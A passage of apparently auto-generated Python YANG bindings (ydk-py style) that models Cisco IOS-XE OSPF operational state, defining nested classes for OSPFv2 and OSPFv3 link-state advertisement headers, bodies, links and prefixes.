OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" 
self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False 
self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = 
"lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" 
self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" 
self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" 
self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): 
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), 
['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] 
# NOTE(review): this chunk appears to be auto-generated ydk-py bindings for the
# Cisco-IOS-XE 'ospf-oper' YANG model whose original newlines were lost; the
# code below restores conventional formatting without changing any token.
# The leading statements continue an __init__ begun before this chunk
# (Ospfv3IaPrefix under OspfInterface.IntfLinkScopeLsas.AreaScopeLsa).
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
    ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
    ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
# The list key 'prefix' is embedded in the XPath segment as a key predicate.
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True

def __setattr__(self, name, value):
    # Restrict writable leaf names to the model-declared set.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)


class IntfMultiTopology(Entity):
    """Multi-topology entry of an OSPF interface; list keyed by 'name'."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, self).__init__()

        self.yang_name = "intf-multi-topology"
        self.yang_parent_name = "ospf-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['name']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('name', (YLeaf(YType.str, 'name'), ['str'])),
        ])
        self.name = None
        self._segment_path = lambda: "intf-multi-topology" + "[name='" + str(self.name) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, ['name'], name, value)


class AreaScopeLsa(Entity):
    """List of area-scope LSAs of an OSPF area; list keyed by 'lsa_type'."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, self).__init__()

        self.yang_name = "area-scope-lsa"
        self.yang_parent_name = "ospf-area"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['lsa_type']
        self._child_classes = OrderedDict([("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_))])
        self._leafs = OrderedDict([
            ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
        ])
        self.lsa_type = None

        self.area_scope_lsa = YList(self)
        self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, ['lsa_type'], name, value)


    class AreaScopeLsa_(Entity):
        """Inner LSA entry keyed by ('lsa_type', 'adv_router').

        Trailing underscore avoids clashing with the enclosing class name.
        The __init__ continues on the next source lines (chunk boundary).
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, self).__init__()

            self.yang_name = "area-scope-lsa"
            self.yang_parent_name = "area-scope-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['lsa_type','adv_router']
            # One entry per LSA container type the model can decode into.
            self._child_classes = OrderedDict([
                ("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa)),
                ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link)),
                ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology)),
                ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External)),
                ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa)),
                ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link)),
                ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix)),
                ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix)),
            ])
            self._leafs = OrderedDict([
                ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
                ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
                ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
                ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
            ])
            self.lsa_type = None
            self.adv_router = None
# NOTE(review): newline-stripped generated ydk-py code, reformatted with all
# tokens unchanged. These first statements continue AreaScopeLsa_.__init__.
self.decoded_completed = None
self.raw_data = []

self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"

self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa()
self.ospfv3_lsa.parent = self
self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"

self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix = YList(self)
self.ospfv3_ia_prefix = YList(self)
# Both list keys appear as predicates in the XPath segment.
self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True

def __setattr__(self, name, value):
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)


class Ospfv2Lsa(Entity):
    """Decoded OSPFv2 LSA (header + body) of an area-scope LSA entry."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, self).__init__()

        self.yang_name = "ospfv2-lsa"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([
            ("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header)),
            ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody)),
        ])
        self._leafs = OrderedDict()

        self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header()
        self.header.parent = self
        self._children_name_map["header"] = "header"

        self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody()
        self.lsa_body.parent = self
        self._children_name_map["lsa_body"] = "lsa-body"
        self._segment_path = lambda: "ospfv2-lsa"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, [], name, value)


    class Header(Entity):
        """OSPFv2 LSA header fields (RFC 2328-style header leaves)."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, self).__init__()

            self.yang_name = "header"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
            ])
            self.lsa_id = None
            self.opaque_type = None
            self.opaque_id = None
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            self.flag_options = Bits()
            self._segment_path = lambda: "header"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)


    class LsaBody(Entity):
        """Decoded OSPFv2 LSA body; holds the 'network' container."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, self).__init__()

            self.yang_name = "lsa-body"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network))])
            self._leafs = OrderedDict([
                ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
            ])
            self.num_of_links = None
            self.summary_mask = None
            self.external_mask = None
            self.body_flag_options = Bits()

            self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network()
            self.network.parent = self
            self._children_name_map["network"] = "network"
            self._segment_path = lambda: "lsa-body"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)


        class Network(Entity):
            """Network-LSA body: mask plus the list of attached routers."""

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, self).__init__()

                self.yang_name = "network"
                self.yang_parent_name = "lsa-body"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                    ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                ])
                self.network_mask = None
                self.attached_router = []
                self._segment_path = lambda: "network"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)


class Ospfv2Link(Entity):
    """Router-LSA link entry; list keyed by ('link_id', 'link_data')."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, self).__init__()

        self.yang_name = "ospfv2-link"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['link_id','link_data']
